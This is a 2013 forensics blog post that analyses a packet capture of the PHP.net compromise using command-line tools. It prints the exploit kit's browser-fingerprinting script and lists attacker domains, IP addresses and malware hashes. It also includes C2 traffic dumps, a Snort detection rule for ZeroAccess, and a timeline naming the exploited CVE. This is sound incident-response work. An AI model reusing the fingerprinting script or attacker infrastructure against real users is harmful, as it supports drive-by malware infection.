Command-line Forensics of hacked PHP.net

Update: October 29

@StopMalvertisin recently published a great blog post that covered the five binaries that were served with the help of the PHP.net compromise. We've therefore updated this blog post with a few of their findings in order to give a more complete picture of the events.







The good people from Barracuda Labs were kind enough to share a PCAP file from the PHP.net compromise on their blog.

I decided to have a closer look at that PCAP file to see what can be extracted from it. Since the PCAP contains Windows malware I played safe and did all the analysis on a Linux machine with no Internet connectivity.

For no particular reason I also decided to do all the analysis without any GUI tools. Old skool ;)



~/Desktop$ capinfos barracuda.pcap

File name: barracuda.pcap

File type: Wireshark/tcpdump/... - libpcap

File encapsulation: Ethernet

Number of packets: 1403

File size: 1256656 bytes

Data size: 1234184 bytes

Capture duration: 125 seconds

Start time: Tue Oct 22 19:27:36 2013

End time: Tue Oct 22 19:29:41 2013

Data byte rate: 9897.42 bytes/sec

Data bit rate: 79179.33 bits/sec

Average packet size: 879.67 bytes

Average packet rate: 11.25 packets/sec

We can see that the PCAP is from October 22, i.e. the traffic was captured at least one day before Google Safe Browsing started alerting users that PHP.net was hosting malware. Barracuda Labs made the PCAP file public on October 24.

A good start is to look at IP addresses and hostnames based on DNS traffic. Tshark can give a nice hosts-file formatted output with the following command:

~/Desktop$ tshark -r barracuda.pcap -q -z hosts

# TShark hosts output

#

# Host data gathered from barracuda.pcap

69.147.83.199 php.net

69.147.83.201 y3b.php.net

91.214.203.236 url.whichusb.co.uk

91.214.203.240 aes.whichdigitalphoto.co.uk

144.76.192.102 zivvgmyrwy.3razbave.info

108.168.255.244 j.maxmind.com

74.125.224.146 www.google.com

74.125.224.148 www.google.com

74.125.224.147 www.google.com

74.125.224.144 www.google.com

74.125.224.145 www.google.com

95.106.70.103 uocqiumsciscqaiu.org

213.141.130.50 uocqiumsciscqaiu.org

77.70.85.108 uocqiumsciscqaiu.org

69.245.241.238 uocqiumsciscqaiu.org

78.62.94.153 uocqiumsciscqaiu.org

83.166.105.96 uocqiumsciscqaiu.org

89.215.216.111 uocqiumsciscqaiu.org

176.219.188.56 uocqiumsciscqaiu.org

94.244.141.40 uocqiumsciscqaiu.org

78.60.109.182 uocqiumsciscqaiu.org

213.200.55.143 uocqiumsciscqaiu.org


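To make the "one name, many addresses" pattern in the hosts output easier to spot, the lines can be grouped per hostname. The following is a minimal sketch that works on a few lines copied from the output above; the function names and the `min_ips` cut-off are my own illustrative choices, not part of tshark.

```python
from collections import defaultdict

# A few lines copied from the tshark hosts output above.
HOSTS_OUTPUT = """\
# TShark hosts output
69.147.83.199 php.net
144.76.192.102 zivvgmyrwy.3razbave.info
95.106.70.103 uocqiumsciscqaiu.org
213.141.130.50 uocqiumsciscqaiu.org
77.70.85.108 uocqiumsciscqaiu.org
"""

def ips_per_hostname(hosts_text):
    """Map each hostname to the set of IP addresses it resolved to."""
    resolved = defaultdict(set)
    for line in hosts_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and the comment header
        ip, hostname = line.split(None, 1)
        resolved[hostname].add(ip)
    return dict(resolved)

def many_address_names(resolved, min_ips=3):
    """Hostnames with at least min_ips addresses (arbitrary cut-off)."""
    return sorted(name for name, ips in resolved.items() if len(ips) >= min_ips)

print(many_address_names(ips_per_hostname(HOSTS_OUTPUT)))
```

A large address count is only a hint: in the full output www.google.com also resolves to five addresses, so the hostname itself still has to be judged by eye.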

Several of these hostnames look suspicious; two of them look as if they have been produced by a domain generation algorithm (DGA). However, before proceeding with analyzing these domains I'll also run the PCAP through httpry in order to generate a web-proxy-like log.

~/Desktop/php-net$ httpry -r ../barracuda.pcap 'dst port 80'

httpry version 0.1.6 -- HTTP logging and information retrieval tool

Copyright (c) 2005-2011 Jason Bittel <jason.bittel@gmail.com>

192.168.40.10 69.147.83.199 > GET php.net /

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/styles/phpnet.css

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/styles/site.css

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/userprefs.js

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/styles/print.css

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/images/php.gif

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/images/small_submit_white.gif

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/images/leftbar.png

192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/images/rightbar.png

192.168.40.10 91.214.203.236 > GET url.whichusb.co.uk /stat.htm

192.168.40.10 91.214.203.236 > GET url.whichusb.co.uk /PluginDetect_All.js

192.168.40.10 91.214.203.236 > POST url.whichusb.co.uk /stat.htm

192.168.40.10 91.214.203.240 > GET aes.whichdigitalphoto.co.uk /nid?1

192.168.40.10 144.76.192.102 > GET zivvgmyrwy.3razbave.info /?695e6cca27beb62ddb0a8ea707e4ffb8=43

192.168.40.10 144.76.192.102 > GET zivvgmyrwy.3razbave.info /b0047396f70a98831ac1e3b25c324328/8fdc5f9653bb42a310b96f5fb203815b.swf

192.168.40.10 144.76.192.102 > GET zivvgmyrwy.3razbave.info /b0047396f70a98831ac1e3b25c324328/b7fc797c851c250e92de05cbafe98609

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?9de26ff3b66ba82b35e31bf4ea975dfe

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?90f5b9a1fbcb2e4a879001a28d7940b4

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?8eec6c596bb3e684092b9ea8970d7eae

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?35523bb81eca604f9ebd1748879f3fc1

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?b28b06f01e219d58efba9fe0d1fe1bb3

192.168.40.10 108.168.255.244 > GET j.maxmind.com /app/geoip.js

192.168.40.10 74.125.224.146 > GET www.google.com /

192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?52d4e644e9cda518824293e7a4cdb7a1

192.168.40.10 95.106.70.103 > POST uocqiumsciscqaiu.org /

192.168.40.10 74.125.224.146 > GET www.google.com /

26 http packets parsed
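A log like the one above is easy to post-process. As a rough sketch, assuming the six-column layout shown in this post (source, destination, `>`, method, host, path), the snippet below parses a handful of the lines and picks out the first request that leaves php.net. The helper names are hypothetical, and a real httpry log with other output fields would need a different split.

```python
# A few lines copied from the httpry output above.
LOG = """\
192.168.40.10 69.147.83.199 > GET php.net /
192.168.40.10 69.147.83.201 > GET static.php.net /www.php.net/userprefs.js
192.168.40.10 91.214.203.236 > GET url.whichusb.co.uk /stat.htm
192.168.40.10 91.214.203.236 > POST url.whichusb.co.uk /stat.htm
192.168.40.10 144.76.192.102 > GET 144.76.192.102 /?9de26ff3b66ba82b35e31bf4ea975dfe
"""

def parse_requests(log_text):
    """Turn 'src dst > METHOD host path' lines into dictionaries."""
    requests = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6 or fields[2] != ">":
            continue  # banner, summary or otherwise unexpected line
        src, dst, _, method, host, path = fields
        requests.append({"src": src, "dst": dst, "method": method,
                         "host": host, "path": path})
    return requests

def is_php_net(host):
    """True for php.net itself and any of its subdomains."""
    return host == "php.net" or host.endswith(".php.net")

def first_offsite(requests):
    """First request whose Host header is outside php.net, or None."""
    for request in requests:
        if not is_php_net(request["host"]):
            return request
    return None

hit = first_offsite(parse_requests(LOG))
print(hit["method"], hit["host"] + hit["path"])
```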

url.whichusb.co.uk







We can see that the first HTTP request outside of php.net was a GET request for url.whichusb.co.uk/stat.htm. Let's extract this file (and all the other ones) to disk with NetworkMinerCLI, i.e. the command line version of NetworkMiner Professional. NetworkMinerCLI works just fine in Linux (if you have installed Mono) and it's perfect when you want to automate content extraction from PCAP files, since you can script it to extract metadata and files to disk from the captured packets.

~/Desktop$ mkdir php-net

~/Desktop$ NetworkMinerCLI.exe -r barracuda.pcap -w php-net

NetworkMinerCLI has now produced multiple CSV files that we can grep in (or load into Excel / OpenOffice). The “AssembledFiles” directory contains the files that have been extracted from the packets.

~/Desktop/php-net$ ls

AssembledFiles

barracuda.pcap.CleartextWords.csv

barracuda.pcap.Credentials.csv

barracuda.pcap.DnsRecords.csv

barracuda.pcap.FileInfos.csv

barracuda.pcap.Hosts.csv

barracuda.pcap.Parameters.csv

barracuda.pcap.Sessions.csv

~/Desktop/php-net$ cat AssembledFiles/91.214.203.236/HTTP\ -\ TCP\ 80/stat.htm

<html>

<head>

<script type="text/javascript" src="PluginDetect_All.js"></script>

</head>

<body>

<script>

var os=0;

try

{

var os=PluginDetect.OS;

}

catch(e){}

var jav=0;

try

{

//var javaversion=PluginDetect.getVersion('Java','./getjavainfo.jar');

var javaversion=0;

if(javaversion!=null)

{

jav=1;

}

}

catch(e){}

var acrobat=new Object();

acrobat.installed=false;

acrobat.version=0;

var pdfi=0;

try

{

var adobe=PluginDetect.getVersion("AdobeReader");

if(adobe!=null)

{

pdfi=1;

}

}

catch(e){}

var resoluz=0;

try

{

resoluz=screen.width;

}

catch(e){}

document.write('<form action="stat.htm" method="post"><input type="hidden" name="id" value="" />');

var id=resoluz+'|'+jav+'|'+pdfi;

var frm=document.forms[0];

frm.id.value=id;

frm.submit();

</script>

</body>

</html>

The final part of this JavaScript does an HTTP POST back to stat.htm with a parameter named id and a value in the following format: "ScreenResolutionWidth|Java(1/0)|AdobeReader(1/0)"

The Parameters.csv contains all text based variables and parameters that have been extracted from the PCAP file. I should therefore be able to find the contents of this HTTP POST inside that CSV file.

~/Desktop/php-net$ grep POST barracuda.pcap.Parameters.csv

192.168.40.10,TCP 1040,91.214.203.236,TCP 80,147,10/22/2013 7:27:54 PM,HTTP POST,id,800|1|1

Yep, the following data was posted back to stat.htm (which we expect is under the attacker's control):

Width = 800px

Java = 1 (true)

AdobeReader = 1 (true)
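The pipe-separated value is simple enough to decode programmatically. Here is a small sketch; the function and key names are mine, chosen for illustration, while the field order follows the `resoluz+'|'+jav+'|'+pdfi` line in stat.htm.

```python
def decode_profile(value):
    """Split the posted id value into screen width, Java and Adobe Reader flags."""
    width, java, reader = value.split("|")
    return {
        "screen_width": int(width),    # screen.width in pixels
        "java": java == "1",           # the 'jav' flag
        "adobe_reader": reader == "1", # the 'pdfi' flag
    }

print(decode_profile("800|1|1"))
```

Note that the Java flag carries little information in this capture: the PluginDetect call is commented out and `javaversion` is hard-coded to 0, so the `javaversion!=null` test always succeeds and `jav` is always set to 1.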

zivvgmyrwy.3razbave.info

The first DGA-like URL in the list above was zivvgmyrwy.3razbave.info. Let's proceed by grepping for the DGA hostname and its IP.

~/Desktop/php-net$ grep zivvgmyrwy barracuda.pcap.Hosts.csv | cut -d, -f 1,3,5

144.76.192.102,"zivvgmyrwy.3razbave.info,DE Germany

~/Desktop/php-net$ grep 144.76.192.102 barracuda.pcap.FileInfos.csv | cut -d, -f 1,9,10

144.76.192.102,50599e6c124493994541489e00e816e3,3C68746D<htm

144.76.192.102,8943d7a67139892a929e65c0f69a5ced,3C21444F<!DO

144.76.192.102,97017ee966626d55d76598826217801f,3C68746D<htm

144.76.192.102,dc0dbf82e756fe110c5fbdd771fe67f5,4D5A9000MZ..

144.76.192.102,406d6001e16e76622d85a92ae3453588,4D5A9000MZ..

144.76.192.102,d41d8cd98f00b204e9800998ecf8427e,

144.76.192.102,c73134f67fd261dedbc1b685b49d1fa4,4D5A9000MZ..

144.76.192.102,18f4d13f7670866f96822e4683137dd6,4D5A9000MZ..

144.76.192.102,78a5f0bc44fa387310d6571ed752e217,4D5A9000MZ..

These are the MD5-sums of the files that have been downloaded from that suspicious domain. The last column (column 10 in the original CSV file) is the file's first four bytes in Hex, followed by an ASCII representation of the same four bytes. Hence, files starting with 4D5A (hex for “MZ”) are typically Windows PE32 binaries. We can see that five PE32 files have been downloaded from 144.76.192.102.
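The same triage can be sketched in a few lines of Python. The rows below are copied from the output above; the labels returned by `classify` are my own wording, and a leading "MZ" is only a strong hint of a Windows executable, not proof. The row with no magic bytes has the MD5 d41d8cd98f00b204e9800998ecf8427e, which is the MD5 of zero bytes of input, i.e. an empty file.

```python
import hashlib

# (MD5, first four bytes in hex) pairs copied from the FileInfos output above.
ROWS = [
    ("50599e6c124493994541489e00e816e3", "3C68746D"),
    ("dc0dbf82e756fe110c5fbdd771fe67f5", "4D5A9000"),
    ("d41d8cd98f00b204e9800998ecf8427e", ""),
]

# MD5 of empty input, used to recognise zero-length files.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()

def classify(md5_hex, first_bytes_hex):
    """Rough file-type guess from the MD5 and the leading bytes."""
    if md5_hex == EMPTY_MD5:
        return "empty file"
    magic = bytes.fromhex(first_bytes_hex)
    if magic.startswith(b"MZ"):
        return "MZ header (likely Windows executable)"
    if magic.startswith(b"<"):
        return "markup (HTML or similar)"
    return "unknown"

for md5_hex, magic_hex in ROWS:
    print(md5_hex, classify(md5_hex, magic_hex))
```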

All the listed files have also been carved to disk by NetworkMinerCLI. We can therefore have a quick look at the extracted files to see if any of them uses the IsDebuggerPresent function, which is a common anti-debugging technique used by malware to avoid sandboxes and malware analysts.

~/Desktop/php-net$ fgrep -R IsDebuggerPresent AssembledFiles

Binary file AssembledFiles/144.76.192.102/HTTP - TCP 80/index.html.A62ECF91.html matches

Binary file AssembledFiles/144.76.192.102/HTTP - TCP 80/index.html.63366393.html matches

Binary file AssembledFiles/144.76.192.102/HTTP - TCP 80/index.html.6FA4D5CC.html matches

Binary file AssembledFiles/144.76.192.102/HTTP - TCP 80/index.html.51620EC7.html matches



uocqiumsciscqaiu.org



The other odd-looking domain name was “uocqiumsciscqaiu.org”, which seems to be pointing to a whole array of IP addresses. Let's see what we can find out about this domain:

~/Desktop/php-net$ grep uocqiumsciscqaiu barracuda.pcap.Hosts.csv | cut -d, -f 1,3,4

95.106.70.103,uocqiumsciscqaiu.org,RU Russian Federation

It turns out that the PCAP file contains communication to one of the IP addresses associated with the “uocqiumsciscqaiu.org” domain. The server is located in Russia (according to MaxMind). Going back to our previous httpry log we can see that an HTTP POST was made to this domain. Let's see what content was pushed out to that Russian server!

~/Desktop/php-net$ tshark -r ../barracuda.pcap -R "ip.addr eq 95.106.70.103 and http.request" -x

862 67.365496 192.168.40.10 -> 95.106.70.103 HTTP POST / HTTP/1.1

0000 0a b4 df 27 c2 b0 00 20 18 eb ca 28 08 00 45 00 ...'... ...(..E.

0010 01 05 02 96 40 00 80 06 68 d9 c0 a8 28 0a 5f 6a ....@...h...(._j

0020 46 67 04 2f 00 50 d3 80 46 2f e3 c6 b5 b5 50 18 Fg./.P..F/....P.

0030 ff ff b0 15 00 00 50 4f 53 54 20 2f 20 48 54 54 ......POST / HTT

0040 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 75 6f 63 P/1.1..Host: uoc

0050 71 69 75 6d 73 63 69 73 63 71 61 69 75 2e 6f 72 qiumsciscqaiu.or

0060 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 g..Content-Lengt

0070 68 3a 20 31 32 38 0d 0a 43 61 63 68 65 2d 43 6f h: 128..Cache-Co

0080 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d ntrol: no-cache.

0090 0a 0d 0a 1c 61 37 c4 95 55 9a a0 1c 96 5a 0e e7 ....a7..U....Z..

00a0 f7 16 65 b2 00 9a 93 dc 21 96 e8 70 84 e8 75 6a ..e.....!..p..uj

00b0 04 e2 21 fb f1 2f 96 ce 4e 6c a8 f8 54 ac dd aa ..!../..Nl..T...

00c0 d5 fa c1 61 b5 ec 18 68 38 6e 3b ac 8e 86 a5 d0 ...a...h8n;.....

00d0 f2 62 73 6e ee 37 bc 40 3e 3d 22 0b fe 7c ca 9c .bsn.7.@>="..|..

00e0 49 39 2b d2 cb a2 ec 02 70 2b 58 de 24 75 61 21 I9+.....p+X.$ua!

00f0 85 c9 91 c1 7a ee 0b f7 fd 6c ef e6 c2 6e cb a9 ....z....l...n..

0100 fb ac 65 d8 78 87 fa e2 7f 05 13 a6 73 3d 27 b1 ..e.x.......s='.

0110 db c2 a7 ...

That looks quite odd. Most likely C2 communication or some form of encrypted channel for information leakage.
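One rough way to put a number on "looks odd" is to measure the byte entropy of the POST body. The sketch below uses the 128 body bytes transcribed from the hex dump above (frame offsets 0x93 to 0x112, matching the Content-Length header); the function name is just illustrative. With only 128 bytes the value cannot exceed 7 bits per byte, so a result close to that ceiling is consistent with encrypted or compressed data but does not prove it.

```python
import math
from collections import Counter

# POST body transcribed from the hex dump above (frame offsets 0x93-0x112).
BODY_HEX = """
1c 61 37 c4 95 55 9a a0 1c 96 5a 0e e7
f7 16 65 b2 00 9a 93 dc 21 96 e8 70 84 e8 75 6a
04 e2 21 fb f1 2f 96 ce 4e 6c a8 f8 54 ac dd aa
d5 fa c1 61 b5 ec 18 68 38 6e 3b ac 8e 86 a5 d0
f2 62 73 6e ee 37 bc 40 3e 3d 22 0b fe 7c ca 9c
49 39 2b d2 cb a2 ec 02 70 2b 58 de 24 75 61 21
85 c9 91 c1 7a ee 0b f7 fd 6c ef e6 c2 6e cb a9
fb ac 65 d8 78 87 fa e2 7f 05 13 a6 73 3d 27 b1
db c2 a7
"""

def shannon_entropy(data):
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# Strip all whitespace before decoding the hex string.
body = bytes.fromhex("".join(BODY_HEX.split()))
print(len(body), "bytes,", round(shannon_entropy(body), 2), "bits per byte")
```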

Update: Our friends from stopmalvertising.com confirm that this is C2 traffic from the downloaded Trojan with MD5 c73134f67fd261dedbc1b685b49d1fa4.

ZeroAccess Trojan

Running the PCAP through Snort will generate multiple alerts indicating that UDP traffic to port 53 might be C2 traffic from the ZeroAccess trojan.

10/22-20:28:38.363586 [**] [1:2015474:2] ET TROJAN ZeroAccess udp traffic detected [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 192.168.40.10:1055 -> 85.114.128.127:53

There will also be another alert indicating ZeroAccess traffic, but this time for UDP port 16471:

10/22-20:28:57.501645 [**] [1:2015482:6] ET TROJAN ZeroAccess Outbound udp traffic detected [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 192.168.40.10:1073 -> 219.68.96.128:16471

But when looking closer at the traffic for that alert we only see one outgoing packet, but no response. That wasn't very interesting. However, the rule that was triggered in this particular alert contained a threshold that suppressed alerts for ZeroAccess traffic to other IP addresses. Here is the syntax for the Snort rule:

alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN ZeroAccess Outbound udp traffic detected"; content:"|28 94 8d ab c9 c0 d1 99|"; offset:4; depth:8; dsize:16; threshold: type both, track by_src, count 10, seconds 600; classtype:trojan-activity; sid:2015482; rev:4;)
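The payload conditions in this rule can be sketched as a small predicate. `dsize:16` requires a payload of exactly 16 bytes, and `offset:4; depth:8` limits the search to payload bytes 4 through 11, so the 8-byte pattern has to sit exactly there. The function name and the zero-filled test payloads are made up for illustration; the threshold part of the rule is not modelled.

```python
# The 8-byte content pattern from the Snort rule above.
SIGNATURE = bytes.fromhex("28948dabc9c0d199")

def matches_rule(payload):
    """Check a UDP payload against the rule's dsize/offset/depth/content options."""
    # dsize:16 -> the payload must be exactly 16 bytes long
    if len(payload) != 16:
        return False
    # offset:4 + depth:8 -> only bytes 4..11 are searched,
    # which leaves room for the 8-byte pattern in one position only
    return payload[4:12] == SIGNATURE

# Synthetic payloads (not taken from the PCAP), just to exercise the check.
print(matches_rule(bytes(4) + SIGNATURE + bytes(4)))  # right size and position
print(matches_rule(SIGNATURE + bytes(8)))             # pattern at the wrong offset
```

A display filter that only tests whether the data contains the pattern is looser than the rule, since it ignores both the payload size and the position of the match.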

We can use the content signature to search for other similar packets by using tshark like this:

~/Desktop/php-net$ tshark -R "udp and data.data contains 28:94:8d:ab:c9:c0:d1:99" -r ../barracuda.pcap -T fields -e ip.dst -e udp.port | sort -u

105.129.8.196 16471

111.119.186.150 16471

112.200.137.206 16471

113.162.57.138 16471

114.207.201.74 16471

118.107.222.161 16471

118.175.165.41 16471

121.73.83.62 16471

124.43.201.66 16471

153.166.2.103 16471

173.177.175.241 16471

178.34.223.52 16471

182.160.5.97 16471

185.12.43.63 16471

186.55.140.138 16471

186.88.99.237 16471

187.245.116.205 16471

190.206.224.248 16471

190.213.108.244 16471

197.228.246.213 16471

197.7.33.65 16471

201.1.171.89 16471

202.123.181.178 16471

202.29.179.251 16471

203.81.69.155 16471

212.85.174.80 16471

218.186.195.105 16471

219.68.96.128 16471

24.142.33.67 16471

27.109.17.227 16471

31.169.11.208 16471

37.229.237.130 16471

37.229.239.36 16471

37.237.75.66 16471

37.243.218.70 16471

37.49.224.148 16471

46.40.32.154 16471

50.81.51.167 16471

5.102.206.178 16471

5.12.127.206 16471

5.234.117.85 16471

5.254.141.186 16471

66.26.243.171 16471

70.45.207.23 16471

72.24.235.141 16471

72.252.207.108 16471

75.75.125.203 16471

78.177.67.219 16471

79.54.68.43 16471

84.202.148.220 16471

85.28.144.49 16471

88.222.114.18 16471

92.245.193.137 16471

93.116.10.207 16471

95.180.241.120 16471

95.68.74.55 16471

Wow, the ZeroAccess trojan's P2P C2 traffic sure is noisy; the threshold was probably there for a reason! But let's see which of these servers actually reply to the ZeroAccess traffic:

~/Desktop/php-net$ tshark -r ../barracuda.pcap -R "udp.srcport eq 16471" -T fields -e ip.src > ZeroAccessHosts

~/Desktop/php-net$ fgrep -f ZeroAccessHosts barracuda.pcap.Hosts.csv | cut -d, -f 1,4

27.109.17.227,IN India

37.49.224.148,NL Netherlands

37.229.239.36,UA Ukraine

50.81.51.167,US United States

66.26.243.171,US United States

72.24.235.141,US United States

75.75.125.203,US United States

85.28.144.49,PL Poland

88.222.114.18,LT Lithuania

173.177.175.241,CA Canada

190.213.108.244,TT Trinidad and Tobago

201.1.171.89,BR Brazil

Sweet, those IPs are most likely infected with ZeroAccess as well.
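The "who answered" step boils down to intersecting the queried addresses with the addresses that sent something back from port 16471. A minimal sketch with a handful of addresses taken from the two listings above (the list and function names are hypothetical):

```python
# Destinations the infected host sent ZeroAccess packets to (subset).
QUERIED = ["105.129.8.196", "27.109.17.227", "37.49.224.148", "219.68.96.128"]

# Source addresses of packets coming back from UDP port 16471 (subset,
# with a repeat to mimic one line per packet).
REPLIED = ["37.49.224.148", "27.109.17.227", "27.109.17.227"]

def responders(queried, replied):
    """Queried peers that also show up as a reply source, in query order."""
    replied_set = set(replied)
    return [ip for ip in queried if ip in replied_set]

print(responders(QUERIED, REPLIED))
```

Comparing whole addresses like this also sidesteps a subtlety of fixed-string grep, which matches substrings: a pattern such as 5.102.206.178 would match a line containing 85.102.206.178 as well.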

Bonus Find

Barracuda Labs' public IP address for their malware analysis machine seems to be 64.235.155.80.

~/Desktop/php-net$ cut -d, -f1,3,4 barracuda.pcap.Credentials.csv | head -2

ClientIP,Protocol,Username

192.168.40.10,HTTP Cookie,COUNTRY=USA%2C64.235.155.80
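The cookie value is URL-encoded, with `%2C` standing for a comma. A short sketch of decoding it, assuming the value always has the "country,IP" shape seen here (the function name is illustrative):

```python
from urllib.parse import unquote

def decode_country_cookie(cookie):
    """Split 'NAME=country%2Cip' into (name, country, ip)."""
    name, _, raw_value = cookie.partition("=")
    # unquote turns %2C back into a comma before splitting
    country, _, ip = unquote(raw_value).partition(",")
    return name, country, ip

print(decode_country_cookie("COUNTRY=USA%2C64.235.155.80"))
```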

Timeline



I've created a timeline of the events in the PCAP file provided by Barracuda Labs. This timeline is frame centric, i.e. frame number is used as the first identifier instead of a timestamp. This helps when you wanna find a particular event in the PCAP.

| Frame | Data | Comment |
|---|---|---|
| 15 | Set-Cookie: COUNTRY=USA%2C64.235.155.80 | The external IP of Barracuda's malware lab is stored as a cookie. |
| 139 | GET /www.php.net/userprefs.js | The first entry of infection at PHP.net |
| 147 | POST url.whichusb.co.uk/stat.htm | Width = 800px, Java = True, AcrobatReader = True |
| 174 | GET /b0047396f70a98831ac1e3b25c324328/b7fc797c851c250e92de05cbafe98609 | Triggers CVE-2013-2551 / MS13-037 |
| 213 | Ransomware Zbot downloaded from 144.76.192.102 | File details on VirusTotal or Anubis. MD5: dc0dbf82e756fe110c5fbdd771fe67f5 |
| 299 | Ransomware Zbot downloaded from 144.76.192.102 | File details on VirusTotal or Anubis. MD5: 406d6001e16e76622d85a92ae3453588 |
| 424 | Trojan downloaded from 144.76.192.102 | File details on VirusTotal or Anubis. MD5: c73134f67fd261dedbc1b685b49d1fa4 |
| 534 | ZeroAccess Trojan downloaded from 144.76.192.102 | File details on VirusTotal or Anubis. MD5: 18f4d13f7670866f96822e4683137dd6 |
| 728 | GET /app/geoip.js HTTP/1.0 | MaxMind query by ZeroAccess Trojan downloaded in frame 534 |
| 751 | GET www.google.com | Connectivity test by Trojan downloaded in frame 424 |
| 804 | Vawtrak.A Backdoor / Password Stealer downloaded from 144.76.192.102 | File details on VirusTotal or Anubis. MD5: 78a5f0bc44fa387310d6571ed752e217 |
| 862 | HTTP POST to hxxp://uocqiumsciscqaiu.org | C2 communication by Trojan downloaded in frame 424 |
| 1042 | TCP 16471 | First of the TCP-based ZeroAccess C2 channels |
| 1036 | UDP 16471 | First UDP packet with ZeroAccess C2 data |
| 1041 | UDP 16471 | First UDP ZeroAccess successful reply |

Posted by Erik Hjelmvik on Monday, 28 October 2013 22:15:00 (UTC/GMT)

Tags: #Netresec #PCAP #ZeroAccess #NetworkMinerCLI #NetworkMiner #NetworkMiner Professional